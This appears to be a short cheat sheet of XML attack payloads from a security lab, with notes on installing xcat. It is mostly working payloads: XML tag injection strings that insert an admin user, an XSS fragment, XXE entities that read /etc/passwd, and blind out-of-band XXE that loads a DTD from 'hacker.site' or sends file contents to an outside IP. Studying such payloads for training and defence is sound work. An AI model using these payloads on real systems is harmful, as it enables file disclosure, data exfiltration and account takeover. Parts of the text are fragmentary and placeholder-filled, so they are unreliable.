xml-xxe-xpath

XML-XXE-XPATH

Downloading xcat

1. Download get-pip.py from https://bootstrap.pypa.io/get-pip.py

2. Go to download directory.

3. Run ‘Python3 get-pip.py

4. Go to xcat install directory

XML tag injection

Name: useless Username: useless@yahoo.com</username></user>1l33tadmin@yahoo.com Password: l33t

Name: </name></user>1xx Password: l33t

Name: </name></user>1</rule{NEW LINE}>l33t Password: l33t

&lt;![CDATA[alert]]&gt;(&apos;XSS&apos;)

XML XXE or (XML external entity)

<?xml version="1.0" ?> <!DOCTYPE passwd [ <!ELEMENT passwd ANY> <!ENTITY passwd SYSTEM "file:///etc/passwd"> ]>

&passwd;

Resource inclusion with php input/output streams and encoding

<!DOCTYPE message [

...

]>

...&xxefile;

Resource inclusion

<!DOCTYPE message [ ... <!ENTITY xxefile SYSTEM "file:///etc/passwd"> ]>

...&xxefile;

Working example of post request (XML Tab)

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE crimeTest [ <!ENTITY fakeEntity SYSTEM "file:///etc/passwd"> ]>

matt..&fakeEntity;poop...&fakeEntity;

XXESERVE PROGRAM

<?xml version="1.0" encoding="utf-8"?> <!DOCTYPE root [ <!ENTITY % remote SYSTEM "http://10.100.13.200:8080/xml?f=/etc/passwd"> %remote; %int; %trick;]>

** This is a test for lab number 6 XML External entities (blind)

<?xml version='1.0'?> <!DOCTYPE xxe [ <!ENTITY % EvilDTD SYSTEM 'http://hacker.site/evil.dtd'> %EvilDTD; %LoadOOBEnt; %OOB; ]>